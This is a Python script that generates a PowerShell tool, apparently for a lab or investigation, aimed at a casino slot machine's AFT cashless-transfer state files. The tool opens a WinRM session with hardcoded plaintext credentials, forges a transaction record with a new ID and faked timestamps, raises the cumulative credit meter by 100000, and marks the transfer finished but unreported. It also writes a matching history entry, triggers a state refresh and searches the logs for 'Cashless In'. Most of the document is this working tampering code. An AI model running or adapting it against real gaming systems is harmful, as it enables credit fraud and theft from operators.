import base64
import subprocess
import sys

# Build the full PowerShell script
lines = []
lines.append("$ErrorActionPreference = 'Continue'")
lines.append("$ProgressPreference = 'SilentlyContinue'")
lines.append("$cred = New-Object System.Management.Automation.PSCredential('GOLD-CLUB\\test', (ConvertTo-SecureString 'test' -AsPlainText -Force))")
lines.append("$computerName = '10.0.0.90'")
lines.append("$statePath = 'C:\\Goldclub\\var\\state\\goldclub.aurum.services\\GCMessenger\\SASControler1'")
lines.append("$historyPath = Join-Path $statePath 'History'")
lines.append("$logPath = 'C:\\Goldclub\\var\\log\\SlotLog\\2026-06-17.log'")
lines.append("Write-Host '=== Probe Hop 3: AFT XML State Manipulation ===' -ForegroundColor Cyan")
lines.append('Write-Host "Target: $computerName"')
lines.append("Write-Host ''")
lines.append("Write-Host '[1] Establishing WinRM session...' -ForegroundColor Yellow")
lines.append("try {")
lines.append("    $session = New-PSSession -ComputerName $computerName -Credential $cred -ErrorAction Stop")
lines.append("    Write-Host '    WinRM session established.' -ForegroundColor Green")
lines.append("} catch {")
lines.append('    Write-Host "    ERROR: $_" -ForegroundColor Red')
lines.append("    exit 1")
lines.append("}")
lines.append("")
lines.append("Write-Host ''")
lines.append("Write-Host '[2] Reading existing AFT state XML files...' -ForegroundColor Yellow")
lines.append("Invoke-Command -Session $session -ScriptBlock {")
lines.append("    param($statePath, $historyPath)")
lines.append("    $mostRecentPath = Join-Path $statePath 'GCC_ST_20664_01_aftMostRecentTransaction_v1.xml'")
lines.append("    if (Test-Path $mostRecentPath) {")
lines.append("        $xml = [xml](Get-Content $mostRecentPath -Raw)")
lines.append("        $txn = $xml.AftTransactionSerializer.aftTransaction")
lines.append("        $txnIdStr = ($txn.transactionId.char | ForEach-Object { [char][int]$_ }) -join ''")
lines.append("        $tsBytes = [System.Convert]::FromBase64String($txn.transactionCompletedDateTime)")
lines.append("        $hexStr = ($tsBytes | ForEach-Object { '{0:X2}' -f $_ }) -join ' '")
lines.append("        $expBytes = [System.Convert]::FromBase64String($txn.expiration.bcdData)")
lines.append("        $expHex = ($expBytes | ForEach-Object { '{0:X2}' -f $_ }) -join ' '")
lines.append('        Write-Host "    Version: $($xml.AftTransactionSerializer.version)"')
lines.append('        Write-Host "    Status: $($txn.transferStatus)"')
lines.append('        Write-Host "    Amount: $($txn.requestedNonRestrictedAmount)"')
lines.append('        Write-Host "    TxnId: $txnIdStr"')
lines.append('        Write-Host "    Timestamp bytes: $hexStr"')
lines.append('        Write-Host "    Expiration bytes: $expHex"')
lines.append('        Write-Host "    Cumulative: $($txn.comulativeNonRestrictedAmountMeter)"')
lines.append('        Write-Host "    Reported: $($txn.aftTransactionReported)"')
lines.append('        Write-Host "    Finished: $($txn.aftTransactionFinished)"')
lines.append('        Write-Host "    RequestMsg: $($txn.requestTextMessage)"')
lines.append("    }")
lines.append("    $settingsPath = Join-Path $statePath 'GCC_ST_20664_01_aftCurrentSettings_v2.xml'")
lines.append("    if (Test-Path $settingsPath) {")
lines.append("        $sxml = [xml](Get-Content $settingsPath -Raw)")
lines.append('        Write-Host "    Settings Ver: $($sxml.CurrentAftSettingsSerializer.version)"')
lines.append('        Write-Host "    RegStatus: $($sxml.CurrentAftSettingsSerializer.currentAftSettings.registrationStatus)"')
lines.append("    }")
lines.append("    $historyFiles = Get-ChildItem -Path $historyPath -Filter 'GCC_ST_20664_01_aftTransactionHistory_i*_v1.xml' | Sort-Object Name -Descending | Select-Object -First 1")
lines.append("    if ($historyFiles) {")
lines.append('        Write-Host "    Latest history: $($historyFiles.Name)"')
lines.append("        $hxml = [xml](Get-Content $historyFiles.FullName -Raw)")
lines.append("        $htxn = $hxml.AftTransactionCarrier.aftTransaction")
lines.append("        $hTxnIdStr = ($htxn.transactionId.char | ForEach-Object { [char][int]$_ }) -join ''")
lines.append('        Write-Host "    History TxnId: $hTxnIdStr Amount: $($htxn.requestedNonRestrictedAmount)"')
lines.append("    }")
lines.append("    $datFiles = Get-ChildItem -Path 'C:\\Goldclub\\var\\state\\goldclub.aurum.services' -Filter '*.dat' -Recurse -ErrorAction SilentlyContinue")
lines.append("    if ($datFiles) {")
lines.append('        Write-Host "    Found $($datFiles.Count) .dat files:"')
lines.append('        $datFiles | ForEach-Object { Write-Host "      $($_.FullName) $([math]::Round($_.Length/1024,1)) KB" }')
lines.append("    }")
lines.append("} -ArgumentList $statePath, $historyPath")
lines.append("")
lines.append("Write-Host ''")
lines.append("Write-Host '[3] Creating spoofed AFT transaction...' -ForegroundColor Yellow")
lines.append("$spoofResult = Invoke-Command -Session $session -ScriptBlock {")
lines.append("    param($statePath, $historyPath)")
lines.append("    $mostRecentPath = Join-Path $statePath 'GCC_ST_20664_01_aftMostRecentTransaction_v1.xml'")
lines.append("    $settingsPath = Join-Path $statePath 'GCC_ST_20664_01_aftCurrentSettings_v2.xml'")
lines.append("    $xml = [xml](Get-Content $mostRecentPath -Raw)")
lines.append("    $txn = $xml.AftTransactionSerializer.aftTransaction")
lines.append("")
lines.append("    $newTxnId = 'Spoof Test 99'")
lines.append('    Write-Host "    New TxnId: $newTxnId"')
lines.append("")
lines.append("    $charNodes = @()")
lines.append("    foreach ($ch in $newTxnId.ToCharArray()) {")
lines.append("        $charNode = $xml.CreateElement('char')")
lines.append("        $charNode.InnerText = [int]$ch")
lines.append("        $charNodes += $charNode")
lines.append("    }")
lines.append("    $oldParent = $txn.transactionId")
lines.append("    foreach ($child in @($oldParent.ChildNodes)) { $oldParent.RemoveChild($child) | Out-Null }")
lines.append("    foreach ($cn in $charNodes) { $txn.transactionId.AppendChild($cn) | Out-Null }")
lines.append("    $txn.transactionIdLength = $newTxnId.Length")
lines.append("")
lines.append("    $now = Get-Date")
lines.append("    $nowIso = $now.ToString('yyyy-MM-ddTHH:mm:ss.fffffffzzz')")
lines.append('    Write-Host "    Time: $nowIso"')
lines.append("")
lines.append("    $aurumTxn = $txn.aurumTransactions.AurumTransaction")
lines.append("    $aurumTxn.transferInitiatedTime = $nowIso")
lines.append("    $ns = 'http://BOB.gamingstandards.com'")
lines.append("    $aurumTxn.requestTransfer.SetAttribute('egmDateTime', $ns, $nowIso)")
lines.append("    $aurumTxn.requestTransfer.SetAttribute('cageDateTime', $ns, $nowIso)")
lines.append("    $aurumTxn.authorizeTransfer.SetAttribute('egmDateTime', $ns, $nowIso)")
lines.append("    $aurumTxn.authorizeTransfer.SetAttribute('cageDateTime', $ns, $nowIso)")
lines.append("    $aurumTxn.authorizeTransfer.SetAttribute('egmDateTime2', $ns, $nowIso)")
lines.append("    $aurumTxn.authorizeTransfer.SetAttribute('cageDateTime2', $ns, $nowIso)")
lines.append("    $aurumTxn.authorizeTransfer.SetAttribute('egmDateTime3', $ns, $nowIso)")
lines.append("    $aurumTxn.authorizeTransfer.SetAttribute('cageDateTime3', $ns, $nowIso)")
lines.append("    $aurumTxn.commitTransfer.SetAttribute('egmDateTime', $ns, $nowIso)")
lines.append("    $aurumTxn.commitTransfer.SetAttribute('cageDateTime', $ns, $nowIso)")
lines.append("    $aurumTxn.commitTransfer.SetAttribute('transferDateTime', $ns, $nowIso)")
lines.append("")
lines.append("    $tsBytes = [System.BitConverter]::GetBytes($now.Ticks)")
lines.append("    $txn.transactionCompletedDateTime = [System.Convert]::ToBase64String($tsBytes)")
lines.append("")
lines.append("    $txn.comulativeNonRestrictedAmountMeter = [long]$txn.comulativeNonRestrictedAmountMeter + 100000")
lines.append("    $txn.aftTransactionReported = 'false'")
lines.append("    $txn.aftTransactionFinished = 'true'")
lines.append("    $txn.instanceId = [System.Guid]::NewGuid().ToString()")
lines.append("    $xml.AftTransactionSerializer.version = [int]$xml.AftTransactionSerializer.version + 1")
lines.append("")
lines.append("    $xml.Save($mostRecentPath)")
lines.append('    Write-Host "    Written: $mostRecentPath"')
lines.append("")
lines.append("    $historyFiles = Get-ChildItem -Path $historyPath -Filter 'GCC_ST_20664_01_aftTransactionHistory_i*_v1.xml' -ErrorAction SilentlyContinue")
lines.append("    $maxIndex = 0")
lines.append("    foreach ($f in $historyFiles) {")
lines.append("        if ($f.Name -match 'i(\\d+)_v1\\.xml') {")
lines.append("            $idx = [int]$matches[1]")
lines.append("            if ($idx -gt $maxIndex) { $maxIndex = $idx }")
lines.append("        }")
lines.append("    }")
lines.append("    $nextIndex = $maxIndex + 1")
lines.append('    $newHistoryFile = Join-Path $historyPath "GCC_ST_20664_01_aftTransactionHistory_i${nextIndex}_v1.xml"')
lines.append("")
lines.append("    $historyXml = [xml]('<?xml version=\"1.0\"?><AftTransactionCarrier xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><globalVersion>' + ($maxIndex + 42) + '</globalVersion><version>3</version><aftTransaction></aftTransaction></AftTransactionCarrier>')")
lines.append("    $importedNode = $historyXml.ImportNode($txn, $true)")
lines.append("    $historyXml.AftTransactionCarrier.aftTransaction.AppendChild($importedNode) | Out-Null")
lines.append("    $historyXml.AftTransactionCarrier.aftTransaction.aftTransactionReported = 'false'")
lines.append("    $historyXml.Save($newHistoryFile)")
lines.append('    Write-Host "    History: $newHistoryFile"')
lines.append("")
lines.append("    $settingsXml = [xml](Get-Content $settingsPath -Raw)")
lines.append("    $settingsXml.CurrentAftSettingsSerializer.version = [int]$settingsXml.CurrentAftSettingsSerializer.version + 1")
lines.append("    $settingsXml.Save($settingsPath)")
lines.append("")
lines.append("    return @{ TxnId=$newTxnId; Time=$nowIso; History=$newHistoryFile; Cumulative=$txn.comulativeNonRestrictedAmountMeter }")
lines.append("} -ArgumentList $statePath, $historyPath")
lines.append("")
lines.append('Write-Host "    Spoof: $($spoofResult | ConvertTo-Json -Compress)" -ForegroundColor Green')
lines.append("")
lines.append("Write-Host ''")
lines.append("Write-Host '[4] Attempting OneHand state refresh...' -ForegroundColor Yellow")
lines.append("$refreshResult = Invoke-Command -Session $session -ScriptBlock {")
lines.append("    $results = @()")
lines.append("    Write-Host '    [4a] Checking port 50010...' -ForegroundColor Yellow")
lines.append("    try {")
lines.append("        $tcp = New-Object System.Net.Sockets.TcpClient")
lines.append("        $tcp.Connect('127.0.0.1', 50010)")
lines.append("        Write-Host '    Port 50010 OPEN' -ForegroundColor Green")
lines.append("        $tcp.Close()")
lines.append("        $results += 'PORT_50010_OPEN'")
lines.append("    } catch {")
lines.append('        Write-Host "    Port 50010: $_" -ForegroundColor Red')
lines.append("        $results += 'PORT_50010_CLOSED'")
lines.append("    }")
lines.append("")
lines.append("    try {")
lines.append("        $resp = Invoke-WebRequest -Uri 'http://localhost:50010/GM2AU' -Method GET -TimeoutSec 5 -ErrorAction SilentlyContinue")
lines.append('        Write-Host "    HTTP: $($resp.StatusCode)"')
lines.append("        $preview = $resp.Content.Substring(0, [Math]::Min(500, $resp.Content.Length))")
lines.append('        Write-Host "    Body: $preview"')
lines.append("        $results += 'HTTP_OK'")
lines.append("    } catch {")
lines.append('        Write-Host "    HTTP: $_" -ForegroundColor Red')
lines.append("        $results += 'HTTP_FAIL'")
lines.append("    }")
lines.append("")
lines.append("    Write-Host '    [4b] Checking OneHand process...' -ForegroundColor Yellow")
lines.append("    $proc = Get-Process -Name 'OneHand*' -ErrorAction SilentlyContinue")
lines.append("    if ($proc) {")
lines.append('        Write-Host "    Found: PID $($proc.Id)" -ForegroundColor Green')
lines.append('        $results += "ONEHAND_PID=$($proc.Id)"')
lines.append("        netstat -ano | Select-String '50010|50011' | ForEach-Object { Write-Host \"    $_\" }")
lines.append("    } else {")
lines.append("        Write-Host '    OneHand NOT found' -ForegroundColor Red")
lines.append("        $results += 'ONEHAND_NOT_FOUND'")
lines.append("    }")
lines.append("")
lines.append("    Write-Host '    [4c] Creating trigger file...' -ForegroundColor Yellow")
lines.append("    $triggerPath = 'C:\\Goldclub\\var\\state\\goldclub.aurum.services\\.aft_refresh_trigger'")
lines.append("    Set-Content -Path $triggerPath -Value \"REFREQ $(Get-Date -Format 'o')\" -Force")
lines.append('    Write-Host "    Trigger: $triggerPath"')
lines.append("    $results += 'TRIGGER_CREATED'")
lines.append("")
lines.append("    Write-Host '    [4d] Checking services...' -ForegroundColor Yellow")
lines.append("    $svcs = Get-Service -Name '*OneHand*','*GoldClub*','*Aurum*','*Slot*' -ErrorAction SilentlyContinue")
lines.append("    if ($svcs) {")
lines.append('        $svcs | ForEach-Object { Write-Host "    $($_.Name) = $($_.Status)"; $results += "SVC:$($_.Name)=$($_.Status)" }')
lines.append("    } else {")
lines.append("        Write-Host '    No matching services'")
lines.append("        $results += 'NO_SERVICES'")
lines.append("    }")
lines.append("    return $results")
lines.append("}")
lines.append("")
lines.append("Write-Host '    Refresh results:' -ForegroundColor Yellow")
lines.append('$refreshResult | ForEach-Object { Write-Host "    $_" }')
lines.append("")
lines.append("Write-Host ''")
lines.append("Write-Host '[5] Checking SlotLog for Cashless In...' -ForegroundColor Yellow")
lines.append("Invoke-Command -Session $session -ScriptBlock {")
lines.append("    param($logPath)")
lines.append("    if (Test-Path $logPath) {")
lines.append("        $lastLines = Get-Content $logPath -Tail 200")
lines.append("        $cashless = $lastLines | Select-String 'Cashless In'")
lines.append("        if ($cashless) {")
lines.append('            Write-Host "    Found $($cashless.Count) Cashless In lines:" -ForegroundColor Green')
lines.append('            $cashless | ForEach-Object { Write-Host "    $_" }')
lines.append("        } else {")
lines.append("            Write-Host '    No Cashless In in last 200 lines' -ForegroundColor Yellow")
lines.append("            $aft = $lastLines | Select-String 'AFT|transferStatus|TRANSFER_INHOUSE'")
lines.append("            if ($aft) {")
lines.append('                Write-Host "    Found $($aft.Count) AFT lines:"')
lines.append('                $aft | Select-Object -Last 10 | ForEach-Object { Write-Host "    $_" }')
lines.append("            }")
lines.append("        }")
lines.append("        Write-Host '    Last 5 lines:'")
lines.append('        Get-Content $logPath -Tail 5 | ForEach-Object { Write-Host "    $_" }')
lines.append("    } else {")
lines.append('        Write-Host "    Log not found: $logPath" -ForegroundColor Red')
lines.append("    }")
lines.append("} -ArgumentList $logPath")
lines.append("")
lines.append("Write-Host ''")
lines.append("Write-Host '[6] Examining .dat files...' -ForegroundColor Yellow")
lines.append("Invoke-Command -Session $session -ScriptBlock {")
lines.append("    $stateBase = 'C:\\Goldclub\\var\\state\\goldclub.aurum.services'")
lines.append("    $datFiles = Get-ChildItem -Path $stateBase -Filter '*.dat' -Recurse -ErrorAction SilentlyContinue")
lines.append("    if ($datFiles) {")
lines.append('        Write-Host "    Found $($datFiles.Count) .dat files:"')
lines.append("        $datFiles | ForEach-Object {")
lines.append('            Write-Host "      $($_.FullName) $([math]::Round($_.Length/1024,1)) KB"')
lines.append("            $head = Get-Content $_.FullName -TotalCount 1 -ErrorAction SilentlyContinue")
lines.append('            if ($head) { Write-Host "        Head: $($head.Substring(0, [Math]::Min(100, $head.Length)))" }')
lines.append("        }")
lines.append("    }")
lines.append("    foreach ($subdir in @('payments','validations','features','bonuses')) {")
lines.append("        $dirPath = Join-Path $stateBase $subdir")
lines.append("        if (Test-Path $dirPath) {")
lines.append('            Write-Host "    Dir: $dirPath"')
lines.append('            Get-ChildItem $dirPath -ErrorAction SilentlyContinue | ForEach-Object { Write-Host "      $($_.Name) $([math]::Round($_.Length/1024,1)) KB" }')
lines.append("        }")
lines.append("    }")
lines.append("}")
lines.append("")
lines.append("Write-Host ''")
lines.append("Write-Host '[7] Cleanup...' -ForegroundColor Yellow")
lines.append("Remove-PSSession $session")
lines.append("")
lines.append("Write-Host ''")
lines.append("Write-Host '=== Probe Complete ===' -ForegroundColor Cyan")
lines.append('Write-Host "Spoofed TxnId: $($spoofResult.TxnId)"')
lines.append('Write-Host "Timestamp: $($spoofResult.Time)"')
lines.append('Write-Host "History: $($spoofResult.History)"')
lines.append('Write-Host "Cumulative: $($spoofResult.Cumulative)"')
lines.append("Write-Host \"Refresh: $($refreshResult -join ', ')\"")

script = '\r\n'.join(lines)

# Write the script file
with open(r'c:\Users\Ezbogar\GoldclubLogInvestigator\Probe-AFT-XML-Spoof.ps1', 'wb') as f:
    f.write(script.encode('utf-8'))

print(f'Full script written: {len(lines)} lines, {len(script)} chars')
